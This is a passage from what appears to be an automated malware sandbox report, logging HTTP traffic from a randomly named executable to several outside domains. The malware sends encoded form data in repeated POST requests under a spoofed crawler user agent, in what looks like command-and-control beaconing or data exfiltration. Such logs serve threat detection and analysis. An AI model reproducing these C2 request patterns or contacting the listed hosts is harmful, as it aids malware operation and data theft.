                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.gymroom.online
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.gymroom.online/9v4b/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 64 79 74 62 4b 53 51 64 61 68 4c 33 4a 37 65 31 35 43 4e 47 4e 56 2b 56 39 61 4f 56 74 61 6f 44 4d 6a 57 6e 53 31 57 69 6a 58 33 50 57 32 6f 48 35 6a 70 6c 6d 31 4c 37 2f 57 7a 79 36 45 58 6a 4c 54 57 63 62 52 56 2b 69 71 6f 77 71 33 58 68 75 51 5a 6c 71 79 54 50 4f 45 49 69 5a 74 63 78 47 4e 4f 6b 65 36 4e 34 35 55 39 5a 33 57 62 39 50 53 41 79 30 6d 78 34 67 68 61 64 39 6e 75 32 6c 68 42 4b 61 47 7a 68 52 66 72 62 41 66 74 49 58 4b 64 56 78 77 78 43 4f 50 67 43 36 49 4c 6d 75 7a 64 43 37 73 4a 64 58 4a 36 48 4f 43 63 65 78 43 53 78 35 31 58 33 32 6b 6e 31 77 30 6b 4c 61 33 59 36 53 6a 75 42 38 4d 49 7a 72 48 47 41 48 37 33 76 74 30 57 7a 42 50 32 4d 44 6e 5a 47 71 71 67 51 6d 46 53 36 36 43 37 63 6d 34 34 6b 67 4a 32 4a 34 6c 45 58 73 6b 67 47 6c 72 7a 4b 4e 79 55 38 68 7a 5a 62 73 32 70 73 4c 73 47 37 70 59 32 77 64 65 4c 32 67 68 67 76 41 70 67 63 66 35 42 6e 62 77 37 31 48 71 37 43 49 4f 52 78 53 48 49 41 38 32 49 32 2f 73 63 53 59 75 49 48 4e 49 41 6c 42 71 6b 6b 4b 51 [TRUNCATED]
                                                          Data Ascii: D0Pts04=dytbKSQdahL3J7e15CNGNV+V9aOVtaoDMjWnS1WijX3PW2oH5jplm1L7/Wzy6EXjLTWcbRV+iqowq3XhuQZlqyTPOEIiZtcxGNOke6N45U9Z3Wb9PSAy0mx4ghad9nu2lhBKaGzhRfrbAftIXKdVxwxCOPgC6ILmuzdC7sJdXJ6HOCcexCSx51X32kn1w0kLa3Y6SjuB8MIzrHGAH73vt0WzBP2MDnZGqqgQmFS66C7cm44kgJ2J4lEXskgGlrzKNyU8hzZbs2psLsG7pY2wdeL2ghgvApgcf5Bnbw71Hq7CIORxSHIA82I2/scSYuIHNIAlBqkkKQ+4M6j7PVSQKmimRCW/CUJPM6ZIAgJW+0k8uLMZP0flAgrZpOHVLSQuo3gMEa1YdTooRgd7CCUOpY/OQ4RguU5V6HFkhXBZjzPwRvjyNZi15/cKmq7E0sqW7Zel7Vpe+OOX9NL8Qdi/htF9OutkRjgL10GPjbSBtm7Vm+uhurGY14y7js2NYY5sU/Z74ef/Xn9DU/7hO25DMJ9l3N7HF0eFOEwbvpdPkKkYg/9KQxFlPS9/0bo0Rbxhagxei5x2kBvPFx3V2ypO5NrOuVVuULvJqdd5+wIP3+cNE3bHswm84XvOIEXayWZYtO2T1mTalXKonjjlb1mizHn/5xuELPNZSi7unckNeLS+tntLde/do3n4bav1VPb4To8TPOIVj6dEtrhVil1ITxqOyv+QGLmr4LeeE6bAgg+CcG/NTZcBP3TLiIyZDW6cl6XYPw4TQlhcdclALGroT8DwofFW2wh6v8hdy5ySbwqu1jCwT8tV3C3BOXtZRhIJpobtpr0qyBmfFqj8SkRb6EbZH0YPNHITC1MWCnze1ddfMOp6WXWyvnhrGdv5igXhoUsp680iPW7BTSDg8Ra/5F82ge7xD2A3pcnWC+u30dQ7aRN8VzcrujYsR+bAV0CKLnp7z86lNgXHOjNecss3Jda8qyUkYWWlZIRikntaWadt [TRUNCATED]
                                                          Jul 13, 2024 00:03:25.168262959 CEST298INHTTP/1.1 404 Not Found
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:03:25 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: br
                                                          Data Raw: 35 38 0d 0a a1 a8 04 00 20 76 b6 6e 13 ba d0 b0 c9 17 a2 d2 6c 9a cd 2b af 27 0b b9 7f 97 8c 64 aa 54 d1 9a d0 e8 0d 8f cf c7 90 92 8b 85 2c 09 e3 ac ba 68 9f b0 90 9c 93 8f e4 1b 51 98 0c 93 60 a2 85 80 b0 32 8a 2d 95 0d 55 ed 68 37 f8 cf 05 00 f1 cf d6 bb 6f e3 ea d5 34 23 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 58 vnl+'dT,hQ`2-Uh7o4#0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.64972837.9.175.173805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:27.012871981 CEST468OUTGET /9v4b/?D0Pts04=QwF7JlY1PSjHVra+4y9GAkGIkNjMkM0Pe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNeqyWzLUYbSscBa/GhZ/wr7EAZrjTVHikp9QpcnDnmqECCiEdhejU=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.gymroom.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:03:27.696687937 CEST343INHTTP/1.1 404 Not Found
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:03:27 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Vary: Accept-Encoding
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.649729203.161.41.207805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:32.928778887 CEST719OUTPOST /9ntw/ HTTP/1.1
                                                          Host: www.hectmalt.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.hectmalt.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.hectmalt.xyz/9ntw/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 4f 48 51 38 37 56 76 5a 77 56 37 45 44 47 6f 78 6a 4e 4e 72 6a 79 4c 2f 55 32 4b 47 34 4e 57 79 76 59 46 50 71 71 64 51 70 73 4a 56 6c 56 66 50 71 35 32 6a 6e 42 51 4a 47 2f 6a 56 48 69 34 39 49 4a 33 31 44 53 78 38 2f 63 68 43 69 6c 39 50 73 49 74 57 47 75 70 76 45 37 39 6e 43 76 79 51 56 2f 67 31 31 68 4b 50 46 67 51 42 79 38 6d 50 6b 2f 78 6a 4b 6f 4a 34 57 72 33 32 6f 48 36 4b 57 30 46 41 53 59 4f 68 74 48 74 4f 32 57 38 63 4c 78 4e 41 6d 38 71 79 38 64 64 31 31 4f 32 52 4d 5a 53 61 75 79 52 4b 70 64 45 4a 44 79 6e 76 31 74 34 4c 50 42 42 4e 56 4a 4e 74 31 53 4d 33 77 53 62 31 70 6f 57 2f 4b 52 2f 43
                                                          Data Ascii: D0Pts04=OHQ87VvZwV7EDGoxjNNrjyL/U2KG4NWyvYFPqqdQpsJVlVfPq52jnBQJG/jVHi49IJ31DSx8/chCil9PsItWGupvE79nCvyQV/g11hKPFgQBy8mPk/xjKoJ4Wr32oH6KW0FASYOhtHtO2W8cLxNAm8qy8dd11O2RMZSauyRKpdEJDynv1t4LPBBNVJNt1SM3wSb1poW/KR/C
                                                          Jul 13, 2024 00:03:33.536286116 CEST533INHTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:03:33 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.649732203.161.41.207805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:35.469006062 CEST743OUTPOST /9ntw/ HTTP/1.1
                                                          Host: www.hectmalt.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.hectmalt.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.hectmalt.xyz/9ntw/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 4f 48 51 38 37 56 76 5a 77 56 37 45 43 6d 34 78 6c 65 6c 72 71 79 4c 34 52 32 4b 47 74 39 58 31 76 59 4a 50 71 72 59 4e 70 59 6c 56 6c 31 50 50 74 37 4f 6a 75 52 51 4a 65 76 6a 51 44 69 34 41 49 4a 7a 4d 44 53 4e 38 2f 63 6c 43 69 6c 4e 50 74 35 74 52 41 2b 70 74 66 4c 39 68 64 2f 79 51 56 2f 67 31 31 68 66 61 46 67 59 42 79 73 57 50 6b 63 70 73 55 59 4a 37 42 62 33 32 37 58 36 4f 57 30 45 6a 53 61 72 4d 74 46 56 4f 32 55 6b 63 4c 6b 78 48 2f 4d 71 6f 34 64 63 34 2b 2f 50 44 4a 50 58 59 77 54 68 51 35 66 67 32 43 45 6d 31 70 65 34 6f 64 52 68 50 56 4c 56 66 31 79 4d 64 79 53 6a 31 37 2f 61 59 46 6c 61 68 73 5a 6a 70 73 79 64 5a 79 51 73 4e 2f 34 33 48 2b 74 44 6b 63 51 3d 3d
                                                          Data Ascii: D0Pts04=OHQ87VvZwV7ECm4xlelrqyL4R2KGt9X1vYJPqrYNpYlVl1PPt7OjuRQJevjQDi4AIJzMDSN8/clCilNPt5tRA+ptfL9hd/yQV/g11hfaFgYBysWPkcpsUYJ7Bb327X6OW0EjSarMtFVO2UkcLkxH/Mqo4dc4+/PDJPXYwThQ5fg2CEm1pe4odRhPVLVf1yMdySj17/aYFlahsZjpsydZyQsN/43H+tDkcQ==
                                                          Jul 13, 2024 00:03:36.064721107 CEST533INHTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:03:35 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.649733203.161.41.207805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:37.998825073 CEST1756OUTPOST /9ntw/ HTTP/1.1
                                                          Host: www.hectmalt.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.hectmalt.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.hectmalt.xyz/9ntw/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 4f 48 51 38 37 56 76 5a 77 56 37 45 43 6d 34 78 6c 65 6c 72 71 79 4c 34 52 32 4b 47 74 39 58 31 76 59 4a 50 71 72 59 4e 70 5a 78 56 6b 47 33 50 74 63 61 6a 38 42 51 4a 53 50 6a 52 44 69 34 6e 49 4e 6d 45 44 53 42 73 2f 65 74 43 77 32 46 50 71 4c 56 52 4a 2b 70 74 58 72 39 67 43 76 79 4a 56 37 45 78 31 68 50 61 46 67 59 42 79 75 2b 50 77 66 78 73 57 59 4a 34 57 72 33 45 6f 48 36 6d 57 30 4e 59 53 61 76 36 74 30 31 4f 32 30 30 63 4a 57 5a 48 32 4d 71 75 32 39 64 72 2b 2b 79 64 4a 50 6a 69 77 54 56 71 35 63 38 32 43 41 4c 77 30 38 67 48 49 67 30 6a 4a 71 74 31 2b 43 59 51 39 43 79 49 39 50 53 6b 48 6b 4f 4b 30 73 2f 6a 70 69 6f 69 79 7a 34 33 77 38 4f 41 36 2b 71 78 63 41 31 44 6d 69 72 73 72 33 4d 6b 69 71 2f 37 2b 45 72 58 6e 73 65 61 6c 32 4a 32 33 63 59 41 6d 56 6f 5a 45 75 39 70 70 58 30 6d 42 6e 64 36 78 63 52 75 4f 37 4b 33 55 79 79 37 33 64 55 59 64 76 5a 47 41 61 62 39 33 4b 63 53 6c 32 47 6c 52 43 52 31 31 30 31 63 53 67 35 46 44 34 4a 52 62 58 67 53 37 51 51 54 55 77 [TRUNCATED]
                                                          Data Ascii: D0Pts04=OHQ87VvZwV7ECm4xlelrqyL4R2KGt9X1vYJPqrYNpZxVkG3Ptcaj8BQJSPjRDi4nINmEDSBs/etCw2FPqLVRJ+ptXr9gCvyJV7Ex1hPaFgYByu+PwfxsWYJ4Wr3EoH6mW0NYSav6t01O200cJWZH2Mqu29dr++ydJPjiwTVq5c82CALw08gHIg0jJqt1+CYQ9CyI9PSkHkOK0s/jpioiyz43w8OA6+qxcA1Dmirsr3Mkiq/7+ErXnseal2J23cYAmVoZEu9ppX0mBnd6xcRuO7K3Uyy73dUYdvZGAab93KcSl2GlRCR1101cSg5FD4JRbXgS7QQTUwzSouavEpmoOWVproBCvHPsPR5uvxVyAWuE9YrD5iFwzXA0jNlH7HuxXSNZI08pDYYf5qIJrdokFghlB+/2kuK64XNxAo91B3+mA2m4a5KckhFB5wGqS2NVETL8y1ETNeCkGNV3DqBlbMPMDmApGAEhb9+3VbhemaooRH11wr7kPIt0Yec0TzD03OfY16eNloh7cnFfocKxJryTnaXWW8buGxL8jh/SuboUkgM08cdZ6UeksVdTdiKbu+9e0NVVogzyaJ9MIuoCtb+Eg1Tqu6GiGrjJ/l6nMGTw7bEtA1OoT69EtKSrMReLTRyZmnBraX9H+eANAAgfxXHr5vH8bt3y/xkXADvJCrQvnJ9a2Jyj9xayX4SlBV1zMEb9yPMMZMVFtnMutnmxXre9gvn30DlB1MQvR60vrBvmeq7icdB2viaaadgZnDryc0BBXZS9dC4fBeJ8+PmUEumYB9WnfGX4XXLIEplSOZUxAwj7pMuQihbCW7grF/ByI/pW3ViprE8qicg3zt73dGA+wV2005v1JFXOHHbwhLHOPVCbRLJXyfOEW3+34htQTiwnkXNAxykAMZ04jwmBf1Uj/kREogW2QlWrt16pkkxsUcL0pH+4goC8WTWRgfA/qovgOcIWo3ZrxLJd0tnK/fMY7HOlQe4DM63SKd4+lX67 [TRUNCATED]
                                                          Jul 13, 2024 00:03:38.602013111 CEST533INHTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:03:38 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.649734203.161.41.207805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:40.530049086 CEST466OUTGET /9ntw/?D0Pts04=DF4c4jTIr0uCfSFE8clupTbEYGiU8fGq77V3jsF9odELuFK4p5vQm2AEcbSTGQxVKs+ZCGJ5ndNcuFNuj9dUFu4scKZ8BqW+NctVnA+PUwBNu7O6tttncLZAbI+QrUa9UBZ9fN0=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.hectmalt.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:03:41.148921013 CEST548INHTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:03:41 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.6497353.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:46.192123890 CEST737OUTPOST /8td2/ HTTP/1.1
                                                          Host: www.atlpicsstudios.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.atlpicsstudios.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.atlpicsstudios.com/8td2/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 63 2b 54 49 7a 37 33 4a 30 4a 78 42 47 67 76 32 79 64 70 66 71 75 37 79 66 4a 34 77 71 4a 55 72 46 43 6c 68 72 31 2b 56 4a 4e 6b 35 41 6f 39 34 4c 49 30 64 79 51 4b 70 49 6a 43 42 6d 35 58 6d 49 6e 35 79 64 58 73 32 6e 31 38 44 59 74 59 54 30 45 46 43 35 4f 48 70 62 63 65 77 69 59 46 39 43 7a 4e 49 36 64 54 31 4e 77 4e 72 57 4b 63 72 62 45 35 45 33 7a 46 48 53 78 4a 56 72 35 77 4f 33 79 76 6d 69 74 2f 73 77 33 52 79 41 31 69 78 67 6e 31 39 44 78 75 68 6b 2f 69 65 37 4d 51 49 63 61 63 49 75 70 32 58 6e 49 34 34 37 67 35 58 70 61 2b 2f 65 58 75 73 76 42 78 54 35 69 37 55 67 52 6f 4e 6a 6c 6f 44 49 58 41 35
                                                          Data Ascii: D0Pts04=c+TIz73J0JxBGgv2ydpfqu7yfJ4wqJUrFClhr1+VJNk5Ao94LI0dyQKpIjCBm5XmIn5ydXs2n18DYtYT0EFC5OHpbcewiYF9CzNI6dT1NwNrWKcrbE5E3zFHSxJVr5wO3yvmit/sw3RyA1ixgn19Dxuhk/ie7MQIcacIup2XnI447g5Xpa+/eXusvBxT5i7UgRoNjloDIXA5


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.6497363.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:48.734755993 CEST761OUTPOST /8td2/ HTTP/1.1
                                                          Host: www.atlpicsstudios.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.atlpicsstudios.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.atlpicsstudios.com/8td2/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
